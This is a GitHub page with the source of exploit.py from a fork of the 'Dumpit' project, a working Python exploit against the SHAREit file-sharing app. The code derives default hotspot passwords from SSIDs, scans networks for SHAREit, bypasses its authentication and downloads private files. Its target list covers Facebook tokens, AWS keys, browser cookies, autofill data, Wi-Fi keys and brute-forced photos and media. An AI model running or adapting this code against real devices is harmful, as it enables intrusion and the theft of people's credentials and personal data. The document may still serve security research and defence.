forked from redforcesec/Dumpit
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.py
More file actions
executable file
·895 lines (804 loc) · 42.7 KB
/
exploit.py
File metadata and controls
executable file
·895 lines (804 loc) · 42.7 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
import sys, os, posixpath, subprocess, platform, urllib, urllib2, urlparse, socket
import re, base64, sqlite3, md5, json, time
from threading import Lock, Thread
#import threading
from tempfile import NamedTemporaryFile
try:
from Queue import Queue
except ImportError:
from queue import Queue
# Worker & Threadpool classes ripped from
# http://code.activestate.com/recipes/577187-python-thread-pool/
class Worker(Thread):
"""Thread executing tasks from a given tasks queue"""
lck = Lock()
def __init__(self, tasks):
Thread.__init__(self)
self.tasks = tasks
self.daemon = True
self.start()
# Global variable that will hold the results
def run(self):
result = []
while True:
#print threading.active_count()
(func, args, kargs) = self.tasks.get()
try:
result = func(*args, **kargs)
#Expected output format {'status':True/False, 'data':[mixed]}
if isinstance(result,dict) and 'status' in result.keys() and result['status']:
Worker.lck.acquire()
exploit.thread_pool_result.append(result['data'])
for r in result['data']:
if isinstance(r,dict):
for k, v in r.iteritems():
print("\t{0}: {1}".format(str(k), str(v)))
elif isinstance(r, list):
print("\t {0}".format(" ".join(r)))
else:
print("\t ", r)
Worker.lck.release()
except Exception as e:
print('[!] Error occured, ', e)
self.tasks.task_done()
class ThreadPool:
"""Pool of threads consuming tasks from a queue"""
def __init__(self, num_threads):
self.tasks = Queue(num_threads)
for _ in range(num_threads):
Worker(self.tasks)
def add_task(self,
func,
*args,
**kargs):
"""Add a task to the queue"""
self.tasks.put((func, args, kargs))
def wait_completion(self):
"""Wait for completion of all the tasks in the queue"""
self.tasks.join()
def count(self):
"""Return number of tasks in the queue"""
return self.tasks.qsize()
class SHAREitResponder(object):
"""
SHAREitResponder
This class would create a background thread that sends presence messages
to target IP and respond to heartbeat packets
"""
version = 1
msg_types = ['heartbeat','general','signal']
def __init__(self, src_ip ='192.168.43.165', target_ip='192.168.43.1',target_port=55283):
self.src_ip = src_ip
self.target_ip = target_ip
self.target_port = int(target_port)
self.msg_type='general'
self.msg = ''
self.stopResponder = False
self.start()
def start(self):
#Clear previous messages
exploit.responder_pool_messages = []
self.msg_pool = exploit.responder_pool_messages
self.thread = Thread(target=self.run, args=())
# Run the thread in daemon mode.
self.thread.daemon = True
self.thread.start()
def stop(self):
self.stopResponder = True
def restart(self):
self.stopResponder = True
time.sleep(0.5)
self.start()
def generate_header(self):
length = hex(len(self.msg))[2:]
length = '00'*4 + length
length = length[-8:]
length_bytes = ''.join([chr(int(length[i-2:i],16)) for i in xrange(8,0,-2)])
version_byte = chr(int(self.version))
if self.msg_type.lower() in self.msg_types:
msg_type_byte = chr(int(self.msg_types.index(self.msg_type.lower())))
else:
msg_type_byte = '\x01'
return version_byte + msg_type_byte + length_bytes
def run(self):
""" Method that runs forever unless stopped """
if not self.stopResponder:
presence_message = {"secure":False,"presence":True,"user_name":"\x48\x61\x63\x6B\x33\x52","user_icon":1,"ip":self.src_ip,"port":"2999","force_response":True,"app_id":"com.lenovo.anyshare.gps","app_ver":400001770,"os_ver":5000,"os_type":"Android","device_category":"phone","screen_width":960,"screen_height":900,"device_model":"RAND0M-DEVICES","release_channel":"www.ushareit.com","device_type":"loodbool","ssid":"EluM9-SGFja2VySW5zaWRl","status":"SEND","msg_id":md5.new(self.src_ip).hexdigest(),"msg_type":"user_presence","msg_ver":1,"from":"DEADD00D8BADF00DDEADD00D8BADF00D","to":"","packet_id":md5.new(self.src_ip).hexdigest(),"packet_type":"presence","version":"1","identity":"DEADD00D8BADF00DDEADD00D8BADF00D","nickname":"66RedForce99"}
self.msg = json.dumps(presence_message)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.target_ip, self.target_port))
packet_header = self.generate_header()
payload = packet_header + self.msg
print('[*] Sending presence message to {0}:{1}'.format(self.target_ip,str(self.target_port)))
s.send(payload)
while not self.stopResponder:
response = s.recv(1024)
#If server stops responding, break to retry
if not response: break
if response == '\x01':
response = s.recv(1024)
time.sleep(0.5)
#Android Heartbeat Packet
if response == '\x00'*5:
s.send('\x01'+'\x00'*5)
if len(response) > 5 and response[0] != chr(int(self.msg_types.index('heartbeat'))):
self.msg_pool.append(response)
s.close()
self.run()
except Exception as e:
print ('[!] Error occured,' , e)
#uncomment line below if you would like it to keep retrying to connect to host even if it was unreachable
#self.run()
print('Exiting responder...')
class HostUnreachable(Exception):
"""
Custom Exception called when download server no longer responds either due to host being unreachable, refusing connection or request time out
"""
def __init__(self):
self.message = 'Unable to connect to SHAREit Server, Host may be unreachable or SHAREit download server is down'
class exploit:
#UdpBroadcastPort = 55526;
#Number of threads to use in scanning/downloading content
threads = 50
#Timeout in seconds when connecting to a device
port_scan_timeout = 2
#Timeout in seconds when connecting to a download server
url_connect_timeout = 3
#Connection error shared pool
connection_errors = {'unreachable_con_count':0,'max_unreachable_con_count':5}
#Thread pool
pool = None
#Shared variable to hold thread results
thread_pool_result = []
#Shared variable to hold target shareit responses
responder_pool_messages = []
#SHAREit SSID identifier
ssid_regex = re.compile(r'^([ABEFS][A-Za-z0-9]{3,6})-((?:[a-zA-Z0-9+\/]{4})*(?:[a-zA-Z0-9+\/]{4}|[a-zA-Z0-9+\/]{3}=?|[a-zA-Z0-9+\/]{2}(?:==)?))$')
#Conflicting SSIDs
confusing_ssids = ['ASUS','AIGO','AIGALE','AIKA','APPLE','BAIDU','BLINK','BELKIN','BUFFALO','BYZORO','BEACON','CISCO','CMCC-','CMM-','CHINA','DLINK','DNIXS','CYBERDI']
#Allowed assets to be retrieved from device
asset_types = ['photo','video','music','file','app','game','contact','zip','ebook','doc']
#Assets that have thumbnails
assets_with_thumbs = ['photo','video','app','game']
#Media Type array as in Android MediaStore
media_types = ['none', 'photo','music','video','playlist']
#SHAREit Server ports
ports = {'download':2999, 'controller':55283}
juicy_files = {
#stats, apps count, photos count...etc.
'stats':{'type':'xml', 'path':'/data/data/com.lenovo.anyshare.gps/shared_prefs/feed.xml'},
#ssid history, contains the default hotspot settings including plaintext WIFI key
'ssid_history':{'type':'xml', 'path':'/data/data/com.lenovo.anyshare.gps/shared_prefs/SsidHistory.xml'},
#Contains user's name and access token when linked with Facebook
'fb_token':{'type':'xml', 'path':'/data/data/com.lenovo.anyshare.gps/shared_prefs/com.facebook.AccessTokenManager.SharedPreferences.xml'},
#Contains cookies of websites visited using shareit webview
'webview_cookies':{'type':'sqlite', 'path':'/data/data/com.lenovo.anyshare.gps/app_webview/Cookies'},
#Contains autofill data of websites visited using shareit webview
'webview_data':{'type':'sqlite', 'path':'/data/data/com.lenovo.anyshare.gps//app_webview/Web Data'},
#Contains list of all video and music files on device with metadata info
'mediastore':{'type':'sqlite', 'path':'/data/data/com.lenovo.anyshare.gps/databases/media_store.db'},
#History of all files transferred using shareit
'history':{'type':'sqlite', 'path':'/data/data/com.lenovo.anyshare.gps/databases/history.db'},
#Application Settings
'settings':{'type':'xml', 'path':'/data/data/com.lenovo.anyshare.gps/shared_prefs/Settings.xml'},
#Amazon Web Service user key
'aws_auth':{'type':'xml', 'path':'/data/data/com.lenovo.anyshare.gps/shared_prefs/com.amazonaws.android.auth.xml'},
#ShareZone newsfeed
'sharezone':{'type':'sqlite', 'path':'/data/data/com.lenovo.anyshare.gps/databases/share_zone.db'},
#Beyla DB, contains logs and device info
'beyla_db':{'type':'sqlite', 'path':'/data/data/com.lenovo.anyshare.gps/databases/beyla.db'},
}
#------------------------ Begin Func discover_networks ----------------------------------
@staticmethod
def discover_networks():
"""
Discover Shareit Hotspots
Returns hotspot ssid along with other info such as shareit username, auth type, bssid and strength
"""
output = []
networks = exploit.get_available_networks()
if networks is not None and len(networks) > 0:
for network in networks:
if network['ssid'] in exploit.confusing_ssids:
continue
info = exploit.parse_ssid(network['ssid'])
if info is not None:
network.update(info)
if network['auth'].lower() != 'open' and network['device_type'] == 'Desktop' and network['pwd_type'] == 'default':
network['password'] = exploit.get_hotspot_pass(network['ssid'])
output.append(network)
return output
#------------------------ End Func discover_networks ----------------------------------
@staticmethod
def get_available_networks():
operating_system = platform.system()
if operating_system == "Windows":
networks = exploit.get_available_networks_win()
elif operating_system == "Linux":
networks = exploit.get_available_networks_lin()
else:
print('[!] Your current operating system ({0}) is not supported yet'.format(platform.system()))
networks = None
return networks
#------------------------ Begin Func get_available_networks_win ----------------------------------
@staticmethod
def get_available_networks_win():
"""
Retrieve available WI-FI networks in windows OS
Returns dictionary having available SSIDs, BSSIDs, stength and authentication type
"""
r_offset = 4
output = []
try:
results = str(subprocess.check_output(['netsh', 'wlan', 'show', 'network','mode=BSSID'],shell=True))
results = re.sub(r'[^\x01-\x7F]+','',results) #remove non-ascii chars because result can sometimes be gibbrish
results = results.decode('ascii').replace('\r','').split('\n')
#Number of available networks
regex = re.search(r'There are ([0-9]+) networks currently visible',results[2],re.I)
net_no = 0
if regex:
net_no = int(regex.group(1))
if net_no > 0:
results = results[r_offset:-1]
i= 0
while i < len(results):
if len(results[i]) > 6 and results[i][0:5]=='SSID ':
ssid_index = i
auth_index = i + 2
bssid_index = i + 4
strength_index = i + 5
try:
ssid = results[ssid_index].split(':',1)[1].strip()
if ssid == '':
ssid = '[HIDDEN]'
except Exception:
ssid = '[HIDDEN]'
try:
auth = results[auth_index].split(':',1)[1].strip()
except Exception:
auth = '[UNKNOWN]'
try:
bssid = results[bssid_index].split(':',1)[1].strip()
except Exception:
bssid = '[UNKNOWN]'
try:
strength = results[strength_index].split(':',1)[1].strip()[0:-1]
except Exception:
strength = '0'
output.append({'ssid':ssid, 'bssid':bssid, 'auth':auth, 'strength':strength})
i += 10
else:
i += 1
except Exception as e:
print('[!] Error retrieving wifi list', e)
return output
#------------------------ End Func get_available_networks_win ----------------------------------
#------------------------ Begin Func get_available_networks_lin ----------------------------------
@staticmethod
def get_available_networks_lin():
"""
Retrieve available WI-FI networks in Linux OS
Returns dictionary having available SSIDs, BSSIDs, stength and authentication type
"""
output = []
try:
wifi_list_cmd = str(subprocess.check_output(['nmcli -f ssid-hex,bssid,signal,security dev wifi'],shell=True))
except Exception as e:
wifi_list_cmd = None
if wifi_list_cmd is not None:
wifi_list = wifi_list_cmd.split('\n')
if len(wifi_list) > 1:
regex = re.compile(r'^\s*'+r'([^\s]+)\s+'*4)
for index in xrange(1,len(wifi_list)):
matches = regex.search(wifi_list[index])
if matches is not None:
ap = {}
ap['ssid'] = r'[HIDDEN]' if matches.group(1) == '--' else helper.hex2ascii(matches.group(1))
ap['bssid'] = matches.group(2)
ap['strength'] = matches.group(3)
ap['auth'] = r'open' if matches.group(4) == '--' else matches.group(4)
output.append(ap)
return output
#------------------------ End Func get_available_networks_lin ----------------------------------
#------------------------ Begin Func parse_ssid ----------------------------------
@staticmethod
def parse_ssid(ssid):
subnets = ['192.168.43','192.168.1','192.168.173','192.168.137']
pwd_types = ['none','12345678','default','custom']
avatar_ids = ['ID_0','ID_1','ID_2','ID_3','ID_4','ID_5','ID_6','ID_7','ID_8','ID_9','ID_10','ID_11','ID_12','ID_13','ID_14','ID_15']
r = exploit.ssid_regex.search(ssid)
if r and len(r.group(1)) > 0 and len(r.group(2)) > 0:
output = {'username':'','pwd_type':pwd_types[0],'avatar_id':avatar_ids[0],'device_type':'unknown'}
#Determining Device Type
if ssid[0] in ['B','F']:
output['device_type'] = 'Android'
elif ssid[0] == 'E':
output['device_type'] = 'Desktop'
#Decoding Username
output['username'] = helper.base64_decode(r.group(2)).decode('UTF-8')
#Decoding Network Settings
ssid_settings_char = r.group(1)[1:]
if len(ssid_settings_char) == 3:
num = helper.get_ord(ssid_settings_char[1])
output['avatar_id'] = avatar_ids[num % 10]
else:
M = helper.get_ord(ssid_settings_char[0])
lR = helper.get_ord(ssid_settings_char[1])
fR = helper.get_ord(ssid_settings_char[2])
magic_no = (M * len(helper.charset) + lR) * len(helper.charset) + fR
output['pwd_type'] = pwd_types[(magic_no >> 13 & 3)%(len(pwd_types))]
output['avatar_id'] = avatar_ids[(magic_no >> 9 & 15)%(len(avatar_ids))]
return output
return None
#------------------------ End Func parse_ssid ----------------------------------
#------------------------ Begin Func get_hotspot_pass ----------------------------------
@staticmethod
def get_hotspot_pass(ssid):
array = md5.new(ssid.decode('UTF-8')).digest()
password = ''
for i in xrange(0,8):
b = ord(array[i])
num1 = b if b >= 0 else b + 256
b = ord(array[(len(array)-1-i)])
num2 = b if b >= 0 else b + 256
num = (num1 | num2) % 26;
password += helper.get_char(10 + num);
return password
#------------------------ End Func get_hotspot_pass ----------------------------------
#------------------------ Begin Func is_port_open ----------------------------------
@staticmethod
def is_port_open(ip,port,port_type='TCP',timeout=None):
if not re.match(r'^(?:\d{1,3}\.){3}\d{1,3}$',ip):
return False
try:
timeout = timeout if timeout is not None else exploit.port_scan_timeout
socket_mode = socket.SOCK_DGRAM if port_type.upper() == 'UDP' else socket.SOCK_STREAM
s = socket.socket(socket.AF_INET,socket_mode)
s.settimeout(float(timeout))
r = s.connect_ex((ip,int(port)))
s.close()
return r == 0
except Exception:
return False
#------------------------ End Func is_port_open ----------------------------------
#------------------------ Begin Func is_shareit_running ----------------------------------
@staticmethod
def is_shareit_running(ip,scan_timeout=None):
output = {'status':False,'data':'SHAREit is not running at {0}'.format(ip)}
if re.match(r'^(?:\d{1,3}\.){3}\d{1,3}$',ip):
scan_timeout = scan_timeout if scan_timeout is not None else exploit.port_scan_timeout
if (exploit.is_port_open(ip,exploit.ports['download'],'TCP',scan_timeout) and exploit.is_port_open(ip,exploit.ports['controller'],'TCP',scan_timeout)):
output['status'] = True
output['data'] = [{ip: 'Running shareit'}]
return output #This format is used to be safely printed in thread handler
else:
output['data'] = 'Invalid IP address'
return output
#------------------------ End Func is_shareit_running ----------------------------------
#------------------------ Begin Func scan_ip_range ----------------------------------
@staticmethod
def scan_ip_range(ip,ip_from=1,ip_to=255,scan_timeout=None):
exploit.thread_pool_result = []
devices = []
if not re.match(r'^(?:\d{1,3}\.){3}\d{1,3}$',ip):
return devices
scan_timeout = scan_timeout if scan_timeout is not None else exploit.port_scan_timeout
ip_start = '.'.join(ip.split('.')[0:3])
print('[*] Scanning ip range from {0} to {1}'.format(ip_start + '.' + str(int(ip_from)),ip_start + '.' + str(int(ip_to))))
if exploit.pool is None:
exploit.pool = ThreadPool(exploit.threads)
for last_octet in xrange(int(ip_from),int(ip_to)):
target_ip = ip_start + '.' + str(last_octet)
exploit.pool.add_task(exploit.is_shareit_running, target_ip)
exploit.pool.wait_completion()
if exploit.thread_pool_result:
for device in exploit.thread_pool_result:
devices.append(device[0].keys()[0])
return devices
#------------------------ End Func scan_ip_range ----------------------------------
#------------------------ Begin Func is_authorized ----------------------------------
@staticmethod
def is_authorized(ip):
identifier = 'request is not from anyshare user'
hostname = str(ip)+':'+str(exploit.ports['download'])
try:
req = urllib2.Request('http://{0}/download?metadatatype=file&metadataid=%2Fdata%2Fdata%2Fcom.lenovo.anyshare.gps%2Fshared_prefs%2FSettings.xml&filetype=raw'.format(hostname))
response = urllib2.urlopen(req, timeout=exploit.url_connect_timeout)
exploit.connection_errors['unreachable_con_count'] = 0
return not(identifier in response.read().lower())
except urllib2.HTTPError as error:
exploit.connection_errors['unreachable_con_count'] = 0
if error.code == 403:
return False
else:
return not(identifier in error.read().lower())
except urllib2.URLError as e:
if e.reason[0] in [10065, 10060, 10061]: #Target Unreachable, Request Timeout, or connection refused
exploit.connection_errors['unreachable_con_count'] += 1
print '[!] Failed to connect to the target ({0}:{1}), it may be unreachable or SHAREit has stopped'.format(str(ip),str(exploit.ports['download']))
#If host is unreachable, do not try to connect to avoid looping in long circle when bruteforcing files on unreachable host
#if exploit.connection_errors['unreachable_con_count'] >= exploit.connection_errors['max_unreachable_con_count']:
# raise HostUnreachable
else:
exploit.connection_errors['unreachable_con_count'] = 0
print e
return False
except socket.timeout as e:
exploit.connection_errors['unreachable_con_count'] += 1
print '[!] Failed to connect to the target, it may be unreachable or SHAREit has stopped'
except Exception as e:
exploit.connection_errors['unreachable_con_count'] = 0
print e
return False
#------------------------ End Func is_authorized ----------------------------------
@staticmethod
def is_reachable(ip):
max_retries = 3
retry = 0
status = False
while status == False and retry < max_retries:
status = exploit.is_port_open(ip,exploit.ports['download'],'TCP',exploit.port_scan_timeout)
retry += 1
return status
#------------------------ Begin Func auto_connect ----------------------------------
@staticmethod
def auto_connect(src_ip, target_ip):
max_retries = 3
count = 1
responder = None
status = exploit.is_authorized(target_ip)
while not status and count <= max_retries:
#Try to trigger Auth bypass first, if it does not work, try to authenticate
try:
req = urllib2.Request('http://{0}:{1}/doesNotExist'.format(str(target_ip),str(exploit.ports['download'])))
response = urllib2.urlopen(req)
except Exception as e:
print e
pass
if not exploit.is_authorized(target_ip):
if responder is None:
responder = SHAREitResponder(src_ip,target_ip,exploit.ports['controller'])
else:
responder.restart()
time.sleep(1)
count += 1
status = exploit.is_authorized(target_ip)
return status
#------------------------ End Func auto_connect ----------------------------------
#------------------------ Begin Func get_asset ----------------------------------
@staticmethod
def get_asset(ip, asset_type='file', asset_id='',asset_format='raw',returnName = False):
"""
Sends download request to vulnerable shareit endpoint
and return file content or None
"""
parameters = {}
#Determine asset type (e.g. file, photo, video,...etc)
parameters['metadatatype'] = asset_type.lower() if asset_type.lower() in exploit.asset_types else 'file'
#Set proper asset ID or file path if a file is requested
if parameters['metadatatype'] in ['file','app']:
parameters['metadataid'] = str(asset_id)
else:
try:
parameters['metadataid'] = str(int(asset_id))
except Exception:
parameters['metadataid'] = '0'
#Determine output format (thumbnail or raw)
parameters['filetype'] = 'thumbnail' if asset_format.lower() in ['thumbnail','thumb'] else 'raw'
#Return file content if page response is 200 with no exceptions, None otherwise
try:
#socket.setdefaulttimeout(exploit.url_connect_timeout)
hostname = str(ip)+':'+str(exploit.ports['download'])
url = 'http://' + hostname + '/download?' + urllib.urlencode(parameters)
#print ("[*] Requesting " + url)
req = urllib2.Request(url)
response = urllib2.urlopen(req, timeout=exploit.url_connect_timeout)
if returnName:
output = {'filename':None,'content':response.read()}
filename_header = response.info().getheader('Content-Disposition')
if filename_header is not None:
filename = re.search(r'\w+\s*;\s*filename=(.*)$',filename_header)
if filename and len(filename.group(1)) > 0:
output['filename'] = filename.group(1)
if output['filename'] is None:
output['filename'] = re.sub(r'[^0-9a-zA-Z\-_]+','',str(asset_id))
else:
output = response.read()
exploit.connection_errors['unreachable_con_count'] = 0 #Reset Connection error count
return output
except urllib2.URLError as e:
if e.reason[0] in [10065, 10060, 10061]: #Target Unreachable, Request Timeout, or connection refused
exploit.connection_errors['unreachable_con_count'] += 1
print '[!] Failed to connect to the target, it may be unreachable or SHAREit has stopped'
#if exploit.connection_errors['unreachable_con_count'] >= exploit.connection_errors['max_unreachable_con_count']:
# raise urllib2.URLError
else:
exploit.connection_errors['unreachable_con_count'] = 0 #Reset Connection error count
except socket.timeout as e:
exploit.connection_errors['unreachable_con_count'] += 1
print '[!] Failed to connect to the target, it may be unreachable or SHAREit has stopped'
except Exception as e:
exploit.connection_errors['unreachable_con_count'] = 0 #Reset Connection error count
#print '[!] Error occurred,',e
return None
#------------------------ End Func get_asset ----------------------------------
#------------------------ Begin Func save_file ----------------------------------
@staticmethod
def save_file(destination=None,content='',temp_file_parameters = {'prefix':'DumpIt_'}):
"""
Saves a string or a stream into local file
If not destination is specified, temp file is created with customized attributes
"""
#Make sure that content is always a string
try:
content = '' if content is None else str(content)
except Exception:
return None
#Open destination file for writing
f = None
try:
if destination is not None:
f = open(destination,'wb')
except Exception:
pass
try:
if f is None:
if type(temp_file_parameters) is not dict:
temp_file_parameters = {}
temp_file_parameters['prefix'] = 'DumpIt_'
temp_file_parameters['mode'] = 'wb'
temp_file_parameters['delete'] = False #To avoid race conditions
f = NamedTemporaryFile(**temp_file_parameters)
f.write(content)
f.close()
return f.name
except KeyboardInterrupt:
print('[!] Keyboard interrupt detected, exiting function')
return None
except Exception:
return None
#------------------------ End Func save_file ----------------------------------
#------------------------ Begin Func list_media_from_db ----------------------------------
@staticmethod
def list_media_from_db(ip,asset_type = None):
#Download shareit mediastore DB
res = exploit.get_asset(ip, 'file', exploit.juicy_files['mediastore']['path'])
if res is not None and len(res) > 0:
#Save returned data into file for further processing
mediastore_db = exploit.save_file(None, res)
if mediastore_db is not None and os.path.isfile(mediastore_db):
try:
conn = sqlite3.connect(mediastore_db,detect_types=sqlite3.PARSE_COLNAMES)
conn.text_factory = lambda x: unicode(x, "utf-8", "ignore")
c = conn.cursor()
columns = ['system_id','title','_data','_size','media_type']
output = {}
query = 'SELECT {0} FROM files where _size > 0'.format((','.join(columns)))
if asset_type is not None and asset_type in exploit.media_types:
query += " AND media_type = '{0}'".format(int(exploit.media_types.index(asset_type)))
query += ' ORDER BY _id DESC'
for row in c.execute(query):
media_type = exploit.media_types[int(row[4])] if int(row[4]) < len(exploit.media_types) else 'unknown'
output[row[0]] = {'id':row[0],'title':row[1].encode('UTF-8'),'path':row[2].encode('UTF-8'),'size':row[3],'media_type':media_type}
conn.close()
os.unlink(mediastore_db)
return output
except Exception as e:
#Handle any exception to let it fail safely to None
print('[!] Wasnot able to read data from downloaded db :( Maybe file was corrupt!')
print(e)
pass
os.unlink(mediastore_db)
return None
#------------------------ End Func list_media_from_db ----------------------------------
#------------------------ Begin Func brute_assets ----------------------------------
@staticmethod
def brute_assets(ip,output_path='tmp',asset_type='photo',id_from=1,id_to=1000,id_step=50,child=False):
"""
#Keep old assets if called from parent function
#exploit.thread_pool_result = exploit.thread_pool_result if child else []
exploit.thread_pool_result = []
assets = []
if not re.match(r'^(?:\d{1,3}\.){3}\d{1,3}$',ip) or id_step == 0 or (id_to-id_from)/id_step < 0 or asset_type not in exploit.asset_types:
return assets
asset_format = 'thumbnail' if asset_type in ['photo','video'] else 'raw'
pool = ThreadPool(exploit.threads)
for asset_id in xrange(int(id_from),int(id_to)+1,int(id_step)):
pool.add_task(exploit.save_asset,ip,output_path,asset_type,asset_id,asset_format)
pool.wait_completion()
if exploit.thread_pool_result:
if child or id_step == 1:
for item in exploit.thread_pool_result:
assets.append(item[0])
else:
sorteditems = sorted(exploit.thread_pool_result, key=lambda k:k[0]['id'])
for i in xrange(0,len(sorteditems)):
item = sorteditems[i][0]
prev = id_from if i == 0 else sorteditems[i-1][0]['id']
minimum = item['id']+1 if item['id']-prev <= 50 else max(0,item['id']-int(id_step))
maximum = min(item['id']+int(id_step),id_to)
newassets = exploit.brute_assets(ip,output_path,asset_type,minimum,maximum,1,child=True)
assets.append(item)
assets = assets + newassets
return assets
"""
assets = []
if id_step == 0 or (id_to-id_from)/id_step < 0:
return assets
asset_format = 'thumbnail' if asset_type in ['photo','video'] else 'raw'
asset_ids = range(int(id_from),int(id_to)+1,int(id_step))
assets = exploit.download_multi_assets(ip,output_path,asset_type,asset_ids,asset_format)
if assets is not None and len(assets) > 0:
if not (child or id_step == 1):
sorteditems = sorted(assets, key=lambda k:k['id'])
for i in xrange(0,len(sorteditems)):
item = sorteditems[i]
item['id'] = int(item['id'])
prev = id_from if i == 0 else sorteditems[i-1]['id']
minimum = item['id']+1 if item['id']-prev <= 50 else max(0,item['id']-int(id_step))
maximum = min(item['id']+int(id_step),id_to)
newassets = exploit.brute_assets(ip,output_path,asset_type,minimum,maximum,1,child=True)
assets = assets + newassets
return assets
#------------------------ End Func brute_assets ----------------------------------
#------------------------ Begin Func save_asset ----------------------------------
@staticmethod
def save_asset(ip, output_path = 'tmp', asset_type='file', asset_id='',asset_format='raw'):
asset_id = str(asset_id)
output = {'status':False,'data':[{'id':(asset_id), 'path':'Asset ({0}:{1}) cannot be retrieved'.format(asset_type,asset_id)}]}
#If host is unreachable, do not try to connect to avoid looping in long circle when bruteforcing files on unreachable host
if exploit.connection_errors['unreachable_con_count'] >= exploit.connection_errors['max_unreachable_con_count']:
raise HostUnreachable
return output #if it survived exception somehow
response = exploit.get_asset(ip, asset_type, str(asset_id), asset_format, True)
if response is not None:
if len(response['filename']) > 0 :
base, extension = posixpath.splitext(response['filename'])
base = asset_id + '-' + base.replace('_','')
extension = extension[1:] or None
if base is None:
base = asset_id
if extension is None:
extension = 'jpg' if asset_format in ['thumb','thumbnail'] else 'bin'
filename = '{0}_{1}_{2}_{3}_{4}'.format(asset_format, ip.replace('.','-'), asset_type, base, str(time.time()))
filename = '{0}.{1}'.format(re.sub(r'[^0-9a-zA-Z\-_]+','',filename),extension)
path = os.path.abspath(output_path)
file_path = ''
try:
#Create directory if it does not exist
if not os.path.isdir(path):
helper.mkdir(path)
file_path = os.path.join(path,filename)
exploit.save_file(file_path,response['content'])
except Exception as e:
print('[!] Unable to save {0} #{1} to {2}'.format(asset_type,asset_id,file_path))
file_path = ''
output['status'] = True
output['data'][0]['path'] = file_path
return output
#------------------------ End Func save_asset ----------------------------------
#------------------------ Begin Func download_multi_assets ----------------------------------
@staticmethod
def download_multi_assets(ip,output_path='tmp',asset_type='photo',asset_ids=[],asset_format='raw'):
exploit.thread_pool_result = []
assets = []
if not re.match(r'^(?:\d{1,3}\.){3}\d{1,3}$',ip) or len(asset_ids) < 1 or asset_type not in exploit.asset_types:
return None
#Make sure that download port is reachable before getting spawning threads that are hard to control :D
if exploit.is_reachable(ip):
if exploit.pool is None:
exploit.pool = ThreadPool(exploit.threads)
for asset_id in asset_ids:
exploit.pool.add_task(exploit.save_asset,ip,output_path,asset_type,asset_id,asset_format)
exploit.pool.wait_completion()
if exploit.thread_pool_result:
for item in exploit.thread_pool_result:
assets.append(item[0])
return assets
else:
return None
#------------------------ End Func download_multi_assets ----------------------------------
#------------------------ Begin Func download_juicy ----------------------------------
@staticmethod
def download_juicy(ip,output_path='tmp'):
files = [xfile['path'] for key, xfile in exploit.juicy_files.iteritems()]
return exploit.download_multi_assets(ip,output_path,'file',files,'raw')
#------------------------ End Func download_juicy ----------------------------------
#------------------------ Begin Func get_fb_token ----------------------------------
#------------------------ End Func get_fb_token ----------------------------------
#------------------------ Begin Func get_hotspot_info ----------------------------------
@staticmethod
def get_hotspot_info(ip):
print exploit.get_asset(ip, 'file', exploit.juicy_files['ssid_history']['path'],'raw')
#------------------------ End Func get_hotspot_info ----------------------------------
